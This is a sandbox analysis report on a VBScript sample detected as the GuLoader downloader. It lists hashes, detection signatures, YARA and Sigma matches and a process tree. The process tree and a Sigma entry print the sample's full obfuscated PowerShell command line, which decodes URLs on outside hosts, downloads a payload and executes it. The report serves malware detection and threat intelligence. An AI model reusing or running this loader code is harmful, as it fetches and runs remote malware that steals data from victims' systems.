Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Blikvarefabrikken.vbs

Overview

General Information

Sample name:Blikvarefabrikken.vbs
Analysis ID:1658919
MD5:b7d8d9cb6cffa5ae6ecb12d0b1a85b27
SHA1:cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
SHA256:327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2612 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6524 cmdline: ping 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 6560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6456 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 836 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 6560INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x574a0:$b2: ::FromBase64String(
      • 0x10f5f6:$b2: ::FromBase64String(
      • 0x10f62d:$b2: ::FromBase64String(
      • 0x10f665:$b2: ::FromBase64String(
      • 0x10f69e:$b2: ::FromBase64String(
      • 0x10f6d8:$b2: ::FromBase64String(
      • 0x10f713:$b2: ::FromBase64String(
      • 0x10f74f:$b2: ::FromBase64String(
      • 0x10f78c:$b2: ::FromBase64String(
      • 0x10f7ca:$b2: ::FromBase64String(
      • 0x10f809:$b2: ::FromBase64String(
      • 0x7a9a5:$s1: -join
      • 0x87a7a:$s1: -join
      • 0x8ae4c:$s1: -join
      • 0x8b4fe:$s1: -join
      • 0x8cfef:$s1: -join
      • 0x8f1f5:$s1: -join
      • 0x8fa1c:$s1: -join
      • 0x9028c:$s1: -join
      • 0x909c7:$s1: -join
      • 0x909f9:$s1: -join
      Process Memory Space: powershell.exe PID: 6456INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2a011:$b2: ::FromBase64String(
      • 0x25471:$s1: -join
      • 0x117ef0:$s1: -join
      • 0x11f860:$s1: -join
      • 0x1a0b33:$s1: -join
      • 0x1adc08:$s1: -join
      • 0x1b0fda:$s1: -join
      • 0x1b168c:$s1: -join
      • 0x1b317d:$s1: -join
      • 0x1b5383:$s1: -join
      • 0x1b5baa:$s1: -join
      • 0x1b641a:$s1: -join
      • 0x1b6b55:$s1: -join
      • 0x1b6b87:$s1: -join
      • 0x1b6bcf:$s1: -join
      • 0x1b6bee:$s1: -join
      • 0x1b743e:$s1: -join
      • 0x1b75ba:$s1: -join
      • 0x1b7632:$s1: -join
      • 0x1b76c5:$s1: -join
      • 0x1b792b:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi32_6456.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xd2a6:$b2: ::FromBase64String(
      • 0xcce8:$s1: -join
      • 0x6494:$s4: +=
      • 0x6556:$s4: +=
      • 0xa77d:$s4: +=
      • 0xc89a:$s4: +=
      • 0xcb84:$s4: +=
      • 0xccca:$s4: +=
      • 0x168b9:$s4: +=
      • 0x16939:$s4: +=
      • 0x169ff:$s4: +=
      • 0x16a7f:$s4: +=
      • 0x16c55:$s4: +=
      • 0x16cd9:$s4: +=
      • 0x3f0a:$e4: Get-WmiObject
      • 0x40f9:$e4: Get-Process
      • 0x4151:$e4: Start-Process
      • 0x17545:$e4: Get-Process

      Sigma Signatures

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", ProcessId: 7084, ProcessName: wscript.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", ProcessId: 7084, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 